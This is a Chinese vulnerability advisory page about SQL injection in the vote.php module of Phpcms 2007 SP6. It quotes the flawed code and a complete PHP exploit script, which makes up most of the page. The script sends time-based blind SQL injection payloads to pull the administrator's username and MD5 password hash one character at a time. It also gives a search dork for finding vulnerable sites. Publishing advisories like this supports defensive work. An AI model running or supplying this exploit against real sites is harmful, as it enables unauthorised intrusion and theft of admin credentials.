安全研究
安全漏洞
phpcms vote模块SQL注入漏洞
发布日期:2009-10-27
更新日期:2010-06-07
受影响系统:
PHPCMS Phpcms 2007 SP6描述:
Phpcms网站管理系统是国内主流CMS系统之一
Phpcms没有正确地过滤提交给vote.php模块的参数便在SQL查询中使用,远程攻击者可以通过提交恶意请求执行SQL注入攻击。以下是有漏洞的PHP代码段:
vote/vote.php
// 22行
$optionids = is_array($op) ? implode(',',$op) : $op;
...
$db->query("UPDATE ".TABLE_VOTE_OPTION." SET number = number+1 WHERE optionid IN ($optionids) ");
<*来源:ryat (ryat@wolvez.org)
链接:http://huaidan.org/archives/2308.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
print_r('
+---------------------------------------------------------------------------+
Phpcms 2007 SP6 Bind SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by Phpcms 2007"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to phpcms
Example:
php '.$argv[0].' localhost /phpcms/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$benchmark = 100000000;
$timeout = 10;
$cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/ryat%23';
$resp = send();
preg_match('/([a-z0-9]+)_vote_option/', $resp, $pre);
if ($pre) {
echo "Plz Waiting...\n";
/**
* get admin password
*/
$j = 1;
$pass = '';
$hash[0] = 0; //null
$hash = array_merge($hash, range(48, 57)); //numbers
$hash = array_merge($hash, range(97, 102)); //a-f letters
while (strlen($pass) < 32) {
for ($i = 0; $i <= 255; $i ++) {
if (in_array($i, $hash)) {
$cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/(IF((ASCII(SUBSTRING((SELECT/**/password/**/FROM/**/'.$pre[1].'_member/**/WHERE/**/groupid=1/**/LIMIT/**/1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
send();
usleep(2000000);
$starttime = time();
send();
$endtime = time();
$difftime = $endtime - $starttime;
if ($difftime > $timeout) {
$pass .= chr($i);
echo chr($i);
break;
}
}
if ($i == 255)
exit("\nExploit Failed!\n");
}
$j ++;
}
echo "\t";
/**
* get admin username
*/
$j = 1;
$user = '';
while (strstr($user, chr(0)) === false) {
for ($i = 0; i <= 255; $i ++) {
$cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/(IF((ASCII(SUBSTRING((SELECT/**/username/**/FROM/**/'.$pre[1].'_member/**/WHERE/**/groupid=1/**/LIMIT/**/1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
send();
usleep(2000000);
$starttime = time();
send();
$endtime = time();
$difftime = $endtime - $starttime;
if ($difftime > $timeout) {
$user .= chr($i);
echo chr($i);
break;
}
if ($i == 255)
exit("\nExploit Failed!\n");
}
$j ++;
}
exit("Expoilt Success!\nadmin:\t$user\nPassword(md5):\t$pass\n");
} else
exit("Exploit Failed!\n");
function send()
{
global $host, $path, $cmd;
$message = "POST ".$path."vote/vote.php HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "CLIENT-IP: ".time()."\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>
建议:
厂商补丁:
PHPCMS
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.phpcms.cn/
浏览次数:3942
严重程度:0(网友投票)
绿盟科技给您安全的保障